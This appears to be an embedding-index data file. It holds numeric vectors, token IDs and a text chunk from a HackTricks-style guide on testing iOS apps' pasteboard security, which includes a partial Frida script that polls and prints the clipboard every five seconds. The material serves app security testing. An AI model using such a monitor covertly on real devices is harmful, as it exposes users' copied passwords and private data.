-0.28769153356552124, -0.24163486063480377, -0.2283889800310135, -0.9689518213272095, -0.5316523313522339, 0.006092379800975323, -0.14870277047157288, 0.13164593279361725, -0.2159353345632553, 0.3298962712287903, -0.013163845054805279, -0.3324568271636963, 0.4090929627418518, -0.5960039496421814, 0.2822348475456238, -0.5010033249855042, -0.11752597242593765, -0.11576785147190094, 0.2715233564376831, 0.14034461975097656, -0.22670921683311462, -0.3586151897907257, 0.05102091282606125, 0.37441277503967285, 0.4735473096370697, -0.10512667149305344, -0.40182116627693176, -0.5300046801567078, 0.5981127619743347, 0.27947983145713806, -0.37342938780784607, 0.09757430851459503, 0.4354635775089264, 0.15375107526779175, -0.19023390114307404, -0.054883308708667755, -0.5370214581489563, -0.8574948906898499, -0.825690507888794, 0.07305781543254852, -0.7060688138008118, 0.44641757011413574, -0.468912810087204, -0.37387147545814514, 0.3339138329029083, 0.7403492331504822, -0.0536639541387558, -0.5346653461456299, 0.1805400252342224, -0.396368145942688, 0.0503816232085228, -0.1310020387172699, -0.12153211236000061, -0.7016765475273132, -0.7211301326751709, -0.3305319547653198, 0.5532258152961731, 0.16598276793956757, 0.20338942110538483, 0.21775585412979126, 0.5028353929519653, -0.09582756459712982, -0.13520731031894684, -0.3135260343551636, -0.6993035078048706, -0.3289853036403656, 0.1319441795349121, -0.26774030923843384, 0.7340902090072632, -0.5703182816505432, 0.5274032950401306, -0.15414731204509735, -0.23137447237968445, -0.1841544359922409, 0.007002260535955429, -0.63541179895401, 0.08878932148218155, 0.6659227013587952, -0.15854692459106445, 0.15849807858467102, -0.6664378643035889, 0.6553797721862793, 0.302398145198822, 0.17962239682674408, -0.7190660834312439, -0.13209089636802673, -0.5621594190597534, -1.2810050249099731, 0.4593234658241272, 0.12493594735860825, 0.07195018231868744, 0.03348970413208008, -0.018339645117521286, 0.435630202293396, -0.5163654088973999, 0.36736902594566345, 1.0759174823760986, 0.35753172636032104, 0.3039468824863434, -0.7480562925338745, 0.30766189098358154, 0.22913770377635956, -0.27467694878578186, -0.28087925910949707, -0.11682053655385971, -0.23897753655910492, 0.019901713356375694, -0.4291136562824249, -0.8384303450584412, -0.7767341732978821, 0.10384610295295715, 0.6454779505729675, -0.47518637776374817, 0.35484325885772705, -0.38279464840888977, -0.9827897548675537, 0.22877784073352814, 0.24293246865272522, -0.27738532423973083, -0.0732249841094017, 0.5032495260238647, -0.020615503191947937, 0.1376791000366211, -0.1571708470582962, 0.17767192423343658, -0.3078371584415436, -0.3812481462955475, 0.3232402801513672, 0.08699604123830795, -0.37649965286254883, 0.8455760478973389, 0.2999248802661896, -0.9295368194580078, -0.4266105890274048, -0.3630957305431366, 0.11024902015924454, -0.045824676752090454, -0.21182133257389069, -0.08474687486886978, -0.19501274824142456, -0.17754383385181427, 0.0703430250287056, 0.7962613701820374, 0.006288672331720591, -0.8144924640655518, -0.5917479395866394, 0.4764476716518402, 0.16156013309955597, 0.04239359870553017, 0.9077183604240417, -0.7876385450363159, -0.5215672850608826, -0.7406361103057861, 0.09487324208021164, 0.09503971040248871, 0.032099392265081406, 0.7095187306404114, -0.42327970266342163, 0.349874883890152, -0.13282960653305054, -0.09270677715539932, 0.70958411693573, -0.2596462666988373, -0.2740629017353058, 0.8005492687225342, 0.18745097517967224, -0.5599080324172974, -0.7297069430351257, 0.26354309916496277, 0.20893040299415588, 0.14415252208709717, -0.21824893355369568, -0.1668882966041565, 0.20213258266448975, 0.05931049957871437, -0.43278905749320984, -0.6869946122169495, -0.612916111946106, -0.9125562906265259, -0.0699198916554451, 0.0573122501373291, -0.2842239737510681, -0.06766964495182037, -0.012246929109096527, 0.11465487629175186, -0.741899311542511, -0.5947275757789612, 0.6347144246101379, -0.07294400036334991, 0.4712826609611511, -0.5661916136741638, 0.22408929467201233, -0.46550312638282776, 0.02520650252699852, -0.6051838397979736, -0.11573096364736557, -0.43353691697120667, -0.6538307666778564, -0.6010018587112427, -0.12612591683864594, -0.2906913757324219, 0.1674720048904419, -0.18835313618183136, 0.014694664627313614, -0.17058494687080383, -0.39499619603157043, -0.34267744421958923, 1.1247856616973877, -0.4897265136241913, -0.021206460893154144, 0.37585824728012085, 0.22160913050174713, 0.3323298692703247, 0.019925929605960846, -0.269604355096817, 0.08338185399770737, 0.16175591945648193, 0.2037431001663208, 0.22030507028102875, -0.26936835050582886, -0.44506239891052246, 0.14888590574264526, -0.8839293718338013, -0.6569569706916809, -0.5222566723823547, 0.3378065228462219, -0.2573328912258148, -0.19466762244701385, 0.25907912850379944, 0.5170071721076965, 0.24708983302116394, 0.18937140703201294, -0.33377644419670105, 0.6754015684127808, 0.3248996138572693, -0.2555128335952759, 0.044872649013996124, -0.04174118861556053, 0.37124550342559814, -0.32187560200691223, -0.5217039585113525, 0.4749036729335785, -0.8252455592155457, 0.4712211787700653, -0.14402255415916443, 0.2547895312309265, -0.5334579348564148, -0.005037102848291397, 0.4463205337524414, 0.45735156536102295, 0.9450489282608032, -0.089192695915699, 0.2176276296377182, -0.4210779070854187, -0.21000728011131287, -0.25860437750816345, -0.7256600856781006, -0.3736746311187744, 0.22216765582561493, 0.49800530076026917, -0.7740084528923035, -0.05672961845993996, 0.21865195035934448, 0.21110592782497406, 0.03274638205766678, -0.032240163534879684, 0.024708503857254982, -0.55657559633255, -0.07711170613765717, 0.7096064686775208, -0.7094467878341675, -0.2003432810306549, 0.31504687666893005, 0.3099178969860077, -0.6092265248298645, -0.6354424357414246, 0.38858485221862793, 1.2798118591308594, 0.20216703414916992, -0.29808560013771057, -0.018690746277570724, -0.05768701061606407, 0.49793511629104614, 0.04089706391096115, 0.37009868025779724, 0.593382716178894, -0.6603979468345642, 0.2980538606643677, -0.519480288028717, 0.4507075846195221, -0.2922113239765167, -0.01905880495905876, 0.034357696771621704, 0.13706448674201965, -0.46041205525398254, 0.06699154525995255, 0.6290978193283081, 0.12840169668197632, 0.95993971824646, 0.2946016788482666, 0.2430293709039688, -0.5676713585853577, -0.19229941070079803, -0.49634283781051636, 0.16800200939178467, 0.5124433040618896, -0.07345208525657654, -0.22153951227664948, 0.17304305732250214, 0.5798287391662598, -0.820487380027771, 0.10495094209909439, 0.2803526222705841, -0.17493675649166107, -0.20106296241283417, -0.22435063123703003, -0.3050708770751953, 0.05666876211762428, 0.2120811939239502, -0.9770986437797546, 0.29097482562065125, -0.3171882927417755, -0.323900431394577, 0.10257258266210556, -0.40672558546066284, 0.3799439072608948, -0.5124338269233704, 0.47903159260749817, 0.024854613468050957, 0.20812705159187317, 0.15687362849712372, 0.22454901039600372, -0.5855084657669067, 0.7815091609954834, 1.0298779010772705, -0.2557702362537384, 0.5399463176727295, 0.5771771669387817, -0.0915289893746376, 0.5181757807731628, 0.15254893898963928, 0.1789088100194931, -0.5214710831642151, 0.20951201021671295, -0.32072603702545166, -0.38553956151008606, -0.23251645267009735, -0.0174702275544405, 0.022787977010011673, -0.17743825912475586, 0.31371206045150757, -0.30549126863479614, -0.16136962175369263, -1.1568912267684937, -0.015170082449913025, -0.7180494666099548, 0.15150919556617737, 0.3126220405101776, -0.7546095848083496, -0.20515227317810059, 0.7269039154052734, 0.02763838693499565, 0.6172727942466736, -0.054956112056970596, 0.6110419631004333, 0.4022381901741028, 0.62900710105896, -0.11338426917791367, -0.07456746697425842, -0.557379424571991, 0.09575805813074112, -0.08741264790296555, -0.39161229133605957, 0.10531169921159744, -0.29546353220939636, 0.5440574884414673, 0.07422606647014618, -0.11461059004068375, -0.6131063103675842, 0.1483057141304016, -0.3477186858654022, -0.80573570728302, 0.5837140083312988, 0.10226528346538544, -0.21001888811588287, 0.008866650983691216, 0.3847477436065674, -0.6051939129829407, 0.057352785021066666, -0.18203093111515045, -0.6755784153938293, -0.06285261362791061, 0.13921813666820526, -0.4603179097175598, 0.3722338378429413, -0.07434604316949844, -0.28159812092781067, 0.2015155553817749, -0.9153226613998413, -0.7759961485862732, -0.011807385832071304, -0.38620713353157043, -0.5392034649848938, 0.5206409096717834, 0.24818357825279236, 0.5337705612182617, 0.12406675517559052, -0.31620651483535767, -0.1555640697479248, 0.35204386711120605, 1.0333949327468872, -0.0608079768717289, 1.1310703754425049, 0.3523405194282532, -0.24669577181339264, 0.3637121617794037, -0.3055315911769867, 0.8600499033927917, 0.10934218019247055, -0.43496406078338623, -0.10159895569086075, -0.42621663212776184, -0.9316482543945312, -0.7808555364608765, 0.07411414384841919, -0.0834442749619484, 0.6471182107925415, 0.04358828440308571, -0.7650645971298218, -0.09189847856760025, -0.838468611240387, 0.315089613199234, 0.4370858371257782, 0.5059419274330139, 0.5068047642707825, 0.4057510793209076, 0.4614613950252533, -1.0459115505218506, 4.53547477722168, 0.8988305330276489, -0.10076088458299637, 0.20917589962482452, 0.07739030569791794, 0.6723259091377258, 1.4877220392227173, -0.3899153470993042, 0.421622633934021, 0.24645905196666718, -0.17954112589359283, -0.09988553076982498, 0.11609075218439102, 0.5909186005592346, 0.6613147258758545, 0.32506951689720154, -0.5776644945144653, 0.49248188734054565, 0.1028328463435173, -1.1747876405715942, -0.9375880360603333, 0.15206073224544525, -0.2772878110408783, 0.5246886014938354, 0.43651971220970154, 0.2519921064376831, 0.26092106103897095, -0.46692025661468506, -0.2142888605594635, 0.11957921832799911, 0.2755240499973297, -0.5199665427207947, 0.34460970759391785, -0.5901728868484497, -0.3829687237739563, 0.405313640832901, -0.608190655708313, -1.3357133865356445, -0.4625988006591797, 0.20808733999729156, 0.24563759565353394, -0.09734570235013962, -0.020300153642892838, 0.11976952850818634, 0.2639545798301697, 0.5346333384513855, -0.5363506078720093, 0.1944384127855301, 0.7191928625106812, -0.5385487079620361, 0.516828715801239, 0.06984955072402954, 0.703175961971283, 0.01261313445866108, -0.7120879292488098, -0.5085833072662354, -0.22735971212387085, 0.014728362672030926, 0.44591665267944336, 0.2623908817768097, 1.0620136260986328, -0.5223134160041809, 0.08374772220849991, 0.08488864451646805, -0.7668957114219666, 0.8382161855697632, -0.0929415225982666, 1.2193025350570679, 0.02473018318414688, -0.2694628834724426, -0.3305877149105072, 0.22070397436618805, -0.336620956659317, -0.4927014112472534, 0.591765820980072, -0.1912188082933426, 0.01938869245350361, 0.0456123910844326, 0.44110384583473206, -1.0508557558059692, 0.17828983068466187, -0.8442124128341675, -0.8034149408340454, 0.2935234010219574, 1.0558799505233765, 0.8596991896629333, -0.5026770234107971, -0.6834746599197388, 0.07819154858589172, 0.6713698506355286, 0.26456594467163086, 0.18026883900165558, -0.867102861404419, -0.35519373416900635, -0.12283476442098618 ]
[ 101, 16380, 21318, 19707, 2618, 6277, 10760, 21318, 19707, 2618, 6277, 12939, 6631, 2951, 2306, 2019, 10439, 1010, 1998, 2013, 2019, 10439, 2000, 2060, 18726, 1012, 2045, 2024, 2048, 7957, 1997, 19351, 15271, 1024, 2291, 22517, 2236, 19351, 6277, 1024, 2005, 6631, 2951, 2007, 2151, 10439, 1012, 14516, 2011, 12398, 2408, 5080, 23818, 2015, 1998, 10439, 4895, 7076, 9080, 4877, 1006, 2144, 16380, 2184, 1007, 1012, 7661, 1013, 2315, 19351, 15271, 1024, 2005, 6631, 2951, 2007, 2178, 10439, 1006, 2383, 1996, 2168, 2136, 8909, 2004, 1996, 10439, 2000, 3745, 2013, 1007, 2030, 2007, 1996, 10439, 2993, 1006, 2027, 2024, 2069, 2800, 1999, 1996, 2832, 2008, 9005, 2068, 1007, 1012, 2512, 1011, 14516, 2011, 12398, 1006, 2144, 16380, 2184, 1007, 1010, 2008, 2003, 1010, 2027, 4839, 2069, 2127, 1996, 19273, 1006, 4526, 1007, 10439, 8046, 2015, 1012, 2070, 3036, 16852, 1024, 5198, 3685, 3946, 2030, 9772, 6656, 2005, 18726, 2000, 3191, 1996, 19351, 6277, 1012, 2144, 16380, 1023, 1010, 18726, 3685, 3229, 1996, 19351, 6277, 2096, 1999, 4281, 1010, 2023, 10210, 28731, 2015, 4281, 19351, 6277, 8822, 1012, 6207, 19428, 2055, 14516, 2315, 19351, 15271, 1998, 28085, 2015, 2037, 2224, 1012, 2612, 1010, 4207, 16143, 2323, 2022, 2109, 1012, 3225, 1999, 16380, 2184, 2045, 2003, 1037, 2047, 2192, 7245, 3444, 2170, 5415, 12528, 6277, 2008, 2003, 9124, 2011, 12398, 1012, 2009, 4473, 1996, 2236, 19351, 6277, 8417, 2000, 8073, 4651, 2090, 5733, 1012, 2023, 3444, 2064, 2022, 9776, 2065, 1996, 9722, 15867, 2000, 2079, 2061, 1998, 2009, 2003, 2036, 2825, 2000, 2275, 2019, 4654, 16781, 2051, 1998, 3058, 2005, 15826, 2951, 1012, 2059, 1010, 2009, 1005, 1055, 2590, 2000, 4638, 2008, 7591, 2592, 3475, 1005, 1056, 2108, 5552, 2503, 1996, 3795, 19351, 6277, 1012, 2009, 1005, 1055, 2036, 2590, 2000, 4638, 2008, 2019, 4646, 3475, 1005, 1056, 2478, 1996, 3795, 19351, 6277, 2951, 2000, 4685, 4506, 1010, 2004, 24391, 4646, 2071, 17214, 4842, 2023, 2951, 1012, 2019, 4646, 2064, 2036, 4652, 2049, 5198, 2000, 6100, 7591, 2951, 2000, 1996, 12528, 6277, 1006, 2029, 2003, 6749, 1007, 1012, 10763, 4106, 10760, 2291, 22517, 2236, 19351, 6277, 2064, 2022, 4663, 2011, 2478, 2236, 19707, 2618, 6277, 1010, 3945, 1996, 3120, 3642, 2030, 1996, 9227, 12441, 2005, 2023, 4118, 1012, 2478, 1996, 2291, 22517, 2236, 19351, 6277, 2323, 2022, 9511, 2043, 7149, 2007, 7591, 2951, 1012, 7661, 19351, 15271, 2064, 2022, 2580, 2007, 19351, 6277, 24415, 18442, 1024, 3443, 1024, 2030, 19351, 6277, 24415, 19496, 4226, 18442, 1012, 20410, 2065, 7661, 19351, 15271, 2024, 2275, 2000, 2022, 14516, 2004, 2023, 2003, 2139, 28139, 12921, 2144, 16380, 2184, 1012, 1037, 4207, 11661, 2323, 2022, 2109, 2612, 1012, 8790, 4106, 6806, 6559, 2030, 7637, 1996, 2206, 1024, 2236, 19707, 2618, 6277, 2005, 1996, 2291, 1011, 2898, 2236, 19351, 6277, 1012, 19351, 6277, 24415, 18442, 1024, 3443, 1024, 1998, 19351, 6277, 24415, 19496, 4226, 18442, 2005, 7661, 19351, 15271, 1012, 2017, 2064, 2036, 8103, 2030, 7637, 1996, 2139, 28139, 12921, 2275, 7347, 27870, 3372, 1024, 4118, 1998, 20410, 2065, 2009, 1005, 1055, 2108, 2170, 1012, 2043, 8822, 1996, 19351, 15271, 1010, 2045, 2003, 2195, 4751, 2008, 2089, 2022, 8790 ]
hack_tricks
433.txt
0
##ally retrieved : obtain pasteboard name by hooking pasteboardwithname : create : and inspecting its input parameters or pasteboardwithuniquename and inspecting its return value. get the first available pasteboard item : e. g. for strings use string method. or use any of the other methods for the standard data types. get the number of items with numberofitems. check for existence of standard data types with the convenience methods, e. g. hasimages, hasstrings, hasurls ( starting in ios 10 ). check for other data types ( typically utis ) with containspasteboardtypes : initemset :. you may inspect for more concrete data types like, for example an picture as public. png and public. tiff ( utis ) or for custom data such as com. mycompany. myapp. mytype. remember that, in this case, only those apps that declare knowledge of the type are able to understand the data written to the pasteboard. retrieve them using itemsetwithpasteboardtypes : and setting the corresponding utis. check for excluded or expiring items by hooking setitems : options : and inspecting its options for uipasteboardoptionlocalonly or uipasteboardoptionexpirationdate. if only looking for strings you may want to use objection's command ios pasteboard monitor : hooks into the ios uipasteboard class and polls the generalpasteboard every 5 seconds for data. if new data is found, different from the previous poll, that data will be dumped to screen. you may also build your own pasteboard monitor that monitors specific information as seen above. for example, this script ( inspired from the script behind objection's pasteboard monitor ) reads the pasteboard items every 5 seconds, if there's something new it will print it : const uipasteboard = objc. classes. uipasteboard ; const pasteboard = uipasteboard. generalpasteboard ( ) ; var items = " " ; var count = pasteboard. changecount ( ). tostring ( ) ; setinterval ( function ( ) { const currentcount = pasteboard. changecount ( ). tostring ( ) ; const currentitems = pasteboard. items ( ). tostring ( ) ; if ( currentcount = = = count ) { return ; } items
[ 0.3987085521221161, -0.3086951673030853, 0.4274049997329712, 0.9353623986244202, -0.39330920577049255, 0.2309897541999817, -0.1869935840368271, 0.22925487160682678, 0.32313790917396545, 0.24469657242298126, 0.4836234152317047, 0.14844910800457, -0.29217690229415894, -0.23637613654136658, -0.05100446194410324, -0.5090507864952087, -0.33357709646224976, 0.3586263656616211, -1.2120375633239746, -0.7166565656661987, 0.569621741771698, 0.6276706457138062, -0.9216256141662598, -0.415687620639801, -0.3114747107028961, 0.33362066745758057, 0.26337307691574097, 0.046907760202884674, 0.09229990839958191, 0.41339996457099915, 0.37606295943260193, -0.15310123562812805, 0.19907315075397491, -0.3780690133571625, 0.017484556883573532, -0.24250461161136627, 0.9449012875556946, -0.1175626814365387, 0.06698695570230484, -0.6252524256706238, -0.19185197353363037, -0.4992578327655792, -0.21955232322216034, -0.21547982096672058, -0.6915075778961182, -0.36876195669174194, -0.11192025244235992, -0.15555249154567719, 0.9926033616065979, -0.19390776753425598, 0.35520556569099426, 0.47520583868026733, 0.6037814617156982, 0.19091908633708954, 0.49271517992019653, -0.09052443504333496, -0.07926216721534729, -0.4070947766304016, -0.26592519879341125, -0.04424047842621803, 0.7048808932304382, 0.20581702888011932, 0.03334421664476395, -0.36757051944732666, -0.39819639921188354, 0.1303582340478897, -0.023837773129343987, -0.5287076830863953, -0.07384742796421051, 0.17757494747638702, -0.289515882730484, 0.4269959628582001, -0.12704892456531525, -0.19712795317173004, 0.009959126822650433, -0.6396051049232483, 0.012782999314367771, -0.22614718973636627, -0.5028724670410156, 0.7792693376541138, -0.25601187348365784, 0.488338440656662, 0.5049065351486206, -0.24907319247722626, -0.13424012064933777, -0.6653435826301575, 0.10233434289693832, 0.3324736952781677, -0.3539016544818878, -0.2510824203491211, 0.029631279408931732, 0.3531193733215332, -0.8084545731544495, -0.4487147033214569, 0.6437126994132996, 0.6223859190940857, 0.047042667865753174, 0.1435079574584961, 0.37309297919273376, -0.3846205770969391, 0.49116647243499756, 0.34998562932014465, -0.16319531202316284, 0.4234466850757599, -0.31978338956832886, 0.3134453594684601, 0.27186304330825806, -0.33436620235443115, -0.41147154569625854, 0.11978764086961746, 0.4975021481513977, -0.08716801553964615, 0.9322463274002075, -0.1490011066198349, -0.03278875723481178, 0.4709836542606354, 0.48308655619621277, -0.07345994561910629, -0.24268436431884766, 0.7008807063102722, 0.4641580283641815, -0.5011255145072937, -0.6680787801742554, -0.6275140643119812, 0.45664238929748535, 0.4420624375343323, 0.1728355437517166, 0.7300611734390259, -0.8279976844787598, -0.07798255980014801, 0.11092276871204376, 0.20430156588554382, 0.1622755229473114, 0.35041242837905884, -0.37574246525764465, -0.0477779321372509, -0.5621795058250427, -0.06695329397916794, 0.2727312445640564, -0.6521554589271545, 0.8167300224304199, 0.006953687407076359, -0.20947502553462982, 0.8982411623001099, 1.1549612283706665, -0.11468620598316193, -0.42500990629196167, 0.2594330608844757, -0.25024014711380005, 0.42649045586586, -0.4927058219909668, 0.21634727716445923, 0.3764929473400116, -0.6333346366882324, 0.0008947098394855857, 0.44081854820251465, -0.2727143168449402, 0.16502226889133453, -0.9223306179046631, -0.1066000685095787, 0.0968618094921112, 0.9991783499717712, 0.15419672429561615, 0.16144268214702606, -0.3886309862136841, 0.770087480545044, -0.45917433500289917, -1.0996620655059814, -0.49950867891311646, 0.41654181480407715, -0.5102377533912659, 0.21876060962677002, 0.058382000774145126, 0.2821226119995117, 1.0010906457901, 1.002325177192688, 0.059697072952985764, -0.10455073416233063, -0.23941820859909058, 0.5205875039100647, -0.31403738260269165, -0.32283440232276917, 0.4571269452571869, 0.5837416052818298, -0.7740470767021179, 0.46620771288871765, -0.30758294463157654, -0.8863969445228577, -0.6030645370483398, -0.07234533876180649, 0.3189023733139038, 0.575607180595398, -0.3089827299118042, 0.11524929851293564, 0.5742208957672119, 0.15979179739952087, -0.9991856217384338, -0.43911147117614746, 0.09029863774776459, -1.0466219186782837, -0.7185802459716797, -0.24356281757354736, 0.3795213997364044, 0.06922665238380432, -0.058458343148231506, -0.41052427887916565, 0.5992996692657471, 0.24112531542778015, -0.2495233416557312, 0.8037927746772766, 0.6558618545532227, -0.09595193713903427, -0.10667242854833603, 0.25733110308647156, -0.18432092666625977, 0.04715430736541748, -0.3691345751285553, 0.4988986551761627, 0.4423348903656006, 0.35263174772262573, 0.4286077320575714, 0.7828962206840515, 0.5911198258399963, 0.4257783591747284, 0.08165454864501953, -0.3682732880115509, 0.37464603781700134, 0.6469529271125793, -0.4983100891113281, 0.1500198096036911, -0.2937699556350708, 0.6050943732261658, 0.4708613455295563, 0.5645279884338379, 0.36047711968421936, -0.28042393922805786, 0.24415114521980286, -0.2835503816604614, 0.4342809319496155, -0.041123032569885254, 0.06208367645740509, 0.8109236359596252, 0.5266090631484985, 0.9938445687294006, 0.046483658254146576, 0.5876560807228088, -0.09322988986968994, 0.49571001529693604, 0.4460175037384033, 0.46049195528030396, -0.14213457703590393, 0.8404752016067505, 0.3065698444843292, -0.040680672973394394, -0.5286204814910889, -0.7790376543998718, 0.9759894013404846, 1.2136694192886353, -0.5516171455383301, -1.0607538223266602, -0.06339621543884277, -0.048428647220134735, -0.333652526140213, -0.09711231291294098, -0.014878956601023674, 0.25552430748939514, 0.02585662715137005, 0.18359917402267456, -0.2756982743740082, -0.04167516157031059, -0.2610313594341278, -0.14699889719486237, -0.6371244192123413, -0.5072684288024902, -0.7376747727394104, 0.23502549529075623, 0.04349549114704132, -0.5224438309669495, -0.041727036237716675, -1.0365653038024902, -0.8721680045127869, -0.06816064566373825, 0.058848340064287186, 0.41937896609306335, -0.009184389375150204, -0.07902054488658905, -0.8946433067321777, -0.0215543694794178, 0.45134076476097107, 0.7406948208808899, 0.01748640090227127, -0.11156319081783295, -0.3057824373245239, -0.43752413988113403, -0.2347535938024521, -0.4427470564842224, 0.5511189103126526, -0.39206451177597046, 0.424987256526947, -0.3605395257472992, -0.12600886821746826, 0.16666094958782196, 0.5074313879013062, -0.049925632774829865, -0.29150456190109253, 0.69087153673172, -0.33917245268821716, -0.12024541944265366, 0.33423566818237305, 0.3327442407608032, -0.33253371715545654, 0.6119906306266785, 0.1836870312690735, 0.8129543662071228, -0.3654247522354126, 0.0978114902973175, 0.3531270921230316, 1.0884112119674683, 0.040191780775785446, -0.04005201905965805, -0.42511725425720215, -0.5399841070175171, -0.4119357466697693, 0.08519206196069717, -0.028477029874920845, -0.28951939940452576, -0.45119208097457886, -0.8451544642448425, 0.03719155490398407, -1.0051735639572144, 0.058658767491579056, -0.01948419399559498, -0.3312813639640808, 0.7795844674110413, 0.2640044391155243, -0.1862993985414505, -0.14412789046764374, -0.5904195308685303, 0.584158718585968, 0.27438926696777344, -0.17726905643939972, -0.512851357460022, 0.3267625868320465, 0.08109819889068604, -0.1735033392906189, 0.480582594871521, 0.636552095413208, -0.10367464274168015, 0.13330097496509552, -0.5070627927780151, -0.18460114300251007, -0.05663600564002991, 0.7519046664237976, 0.1182049885392189, -0.1989104300737381, 0.008867405354976654, 0.08989261835813522, 0.39108774065971375, 0.38936182856559753, 0.38198769092559814, 0.3071235716342926, 0.34895655512809753, 0.5970259308815002, 0.17173227667808533, -0.7170504331588745, -0.39321786165237427, 0.16131477057933807, 0.17496530711650848, 0.606693685054779, -0.8877590894699097, 0.97008216381073, -0.11032845824956894, 0.5910714864730835, 0.5506758689880371, -0.3247881233692169, -1.2810181379318237, 0.1448197215795517, 0.09596078842878342, 0.6908186078071594, -0.10771995782852173, 0.19001759588718414, 0.06327114254236221, 0.026726894080638885, -0.3306236267089844, 0.21148262917995453, -0.3641202449798584, -0.03875481337308884, -0.544590950012207, 0.08699533343315125, -0.27328792214393616, 0.2935153543949127, -0.8391666412353516, 0.08342703431844711, -0.8695428371429443, -0.518599808216095, -0.9152432680130005, 0.4778069257736206, 0.8377032279968262, 0.7524687051773071, 0.5485559701919556, 0.221587672829628, 0.0016169834416359663, 0.057568300515413284, 0.3009035885334015, -0.683906078338623, 0.26787739992141724, -0.14185921847820282, 0.7943316698074341, 0.2732318043708801, 0.7053107023239136, -0.1931418627500534, 0.028969641774892807, -0.5786492228507996, -0.5264215469360352, 0.4160216450691223, -0.18422313034534454, -1.3172571659088135, -0.5352083444595337, -0.1564948856830597, -0.412676066160202, -1.589751958847046, -0.44656282663345337, -0.1981552094221115, 0.5160960555076599, 1.1853300333023071, -0.8278448581695557, -0.20844414830207825, -0.48763030767440796, 0.4451613128185272, 0.32905229926109314, -0.3161076009273529, -0.2095859944820404, -0.836685299873352, -0.3059808015823364, -0.9548700451850891, -0.11812891066074371, 0.764437735080719, -0.2744857370853424, -0.04514916613698006, -0.9044545888900757, -0.2777988016605377, 0.08278753608465195, -0.1339147388935089, -0.08030913025140762, 0.32326334714889526, -0.14914004504680634, 0.13482721149921417, 0.22714875638484955, -0.5660971999168396, -0.11403921991586685, 0.08607583492994308, -0.5905517339706421, 0.05737299844622612, -0.809674859046936, 0.6034110188484192, 0.13417167961597443, -0.1176995113492012, -0.908118724822998, 0.44246912002563477, -0.707858681678772, 0.20428214967250824, 0.03742352873086929, 0.3204704821109772, -0.02971775270998478, 0.010320439003407955, 0.8970402479171753, -0.14946213364601135, -0.06051609292626381, 0.14702633023262024, 0.4032590389251709, -0.45222729444503784, 0.5084179639816284, -0.49006545543670654, -0.8424186706542969, 0.34822824597358704, -0.971592366695404, 0.5321861505508423, 0.9989092946052551, 0.9068912267684937, -0.11852473765611649, -0.23896807432174683, 0.7232224941253662, 0.18845318257808685, 0.7849061489105225, -0.7929185628890991, -0.6758310198783875, 0.08103900402784348, -0.036189183592796326, -0.04265700280666351, 0.2982395887374878, 0.7979302406311035, -0.745969831943512, -0.43730202317237854, -0.43444567918777466, -0.5447104573249817, -0.11555001139640808, -0.20444220304489136, -0.33516716957092285, 0.5174370408058167, -0.126340851187706, 0.4006901681423187, -0.26759400963783264, 0.07983556389808655, 0.19614218175411224, -0.5339449048042297, 0.22865146398544312, -0.6419424414634705, -0.40660732984542847, -0.23879052698612213, 0.2739386260509491, -0.1290132850408554, -0.24246150255203247, -0.4663581848144531, -0.05723479017615318, 0.2732655704021454, -0.20809215307235718, 0.18546275794506073, -0.24592886865139008, -0.23551657795906067, 0.9053733944892883, 0.32680544257164, -0.29882383346557617, 0.1092347726225853, 0.5890964269638062, 0.07487401366233826, 0.13771967589855194, -0.08084186911582947, -0.6686903238296509, -0.7079707384109497, -0.5612189769744873, 0.21196438372135162, -0.27893197536468506, 0.15483008325099945, -0.7515579462051392, -0.3482743203639984, 0.18710628151893616, 1.0050796270370483, -0.31552159786224365, -0.9057879447937012, 0.5242651104927063, -0.31471312046051025, 0.004582803696393967, -0.5103434324264526, 0.10196975618600845, -0.8389378786087036, -1.061419129371643, -0.055603425949811935, -0.16715994477272034, 0.3395649790763855, 0.15819697082042694, 0.06928938627243042, 0.3235716223716736, 0.04096437990665436, -0.41055038571357727, -0.1723969280719757, -0.4810221791267395, -0.11475477367639542, 0.012957359664142132, -0.6176351308822632, 0.5755969882011414, -0.43682703375816345, 0.39208051562309265, -0.17363086342811584, 0.11816322058439255, 0.0026297196745872498, -0.1522085815668106, -0.3589429557323456, 0.47643861174583435, 0.8056739568710327, -0.31784752011299133, -0.4572858214378357, -0.611280083656311, 0.6264002919197083, 0.19082798063755035, 0.19958238303661346, -0.05653831735253334, 0.20343360304832458, -0.23810915648937225, -0.8713092803955078, 0.5183792114257812, 0.10584431886672974, 0.04815700650215149, -0.48470538854599, 0.09292919188737869, 0.85626620054245, -0.11810809373855591, 0.5974557399749756, 0.8142063617706299, -0.03896881639957428, 0.16472499072551727, -0.9949485063552856, -0.1384875625371933, 0.4176468551158905, 0.3805498778820038, 0.005596568342298269, -0.07110206037759781, -0.5812533497810364, 0.5193284749984741, 0.03489884361624718, -0.46264106035232544, -0.5887457132339478, -0.10531991720199585, 0.523248016834259, -0.7919145822525024, 0.4082624018192291, -0.48647063970565796, -1.1611987352371216, 0.2781110107898712, 0.02218833565711975, -0.22654876112937927, -0.217938631772995, -0.16310232877731323, 0.2002696990966797, -0.2022823691368103, -0.5427697896957397, 0.6913307905197144, -0.4043791592121124, 0.03093765303492546, 0.22334957122802734, -0.17198047041893005, -0.6584115028381348, 0.8243505358695984, 0.3342013657093048, -0.8582438230514526, -0.21290864050388336, -0.6275871396064758, 0.0025055576115846634, -0.45231881737709045, -0.27769747376441956, 0.012803267687559128, 0.4723031222820282, -0.24445265531539917, 0.20597636699676514, 0.6444975137710571, -0.33395737409591675, -0.7447195053100586, -0.5960500836372375, 0.24039411544799805, 0.31116151809692383, -0.1057789996266365, 0.4592076241970062, -0.6818764805793762, -0.4403100311756134, -0.9271059632301331, -0.18904516100883484, 0.46177878975868225, -0.019941894337534904, 0.9548450708389282, -0.45089173316955566, -0.06766271591186523, -0.5466131567955017, -0.20683802664279938, 0.8034573197364807, 0.2111777365207672, -0.22982412576675415, 0.7902691960334778, 0.4453144371509552, -0.47155141830444336, -0.7674657702445984, 0.029791610315442085, 0.4419100284576416, -0.16276855766773224, -0.22945064306259155, -0.13392196595668793, 0.25979843735694885, 0.26285815238952637, -0.31388241052627563, -0.7931571006774902, -0.5892292857170105, -0.6377140879631042, -0.2687908113002777, 0.20112274587154388, -0.06832326948642731, 0.0719427540898323, -0.14558617770671844, 0.13984329998493195, -0.7665611505508423, -0.3069978356361389, 0.33645176887512207, 0.05150303617119789, 0.3378983736038208, -0.37948936223983765, 0.17413298785686493, -0.8020147085189819, -0.1841614991426468, -0.6322147846221924, -0.29763683676719666, -0.3278363049030304, -1.0691815614700317, -0.5076054334640503, -0.038062434643507004, -0.4308205246925354, 0.41242069005966187, -0.1872822344303131, 0.16429540514945984, 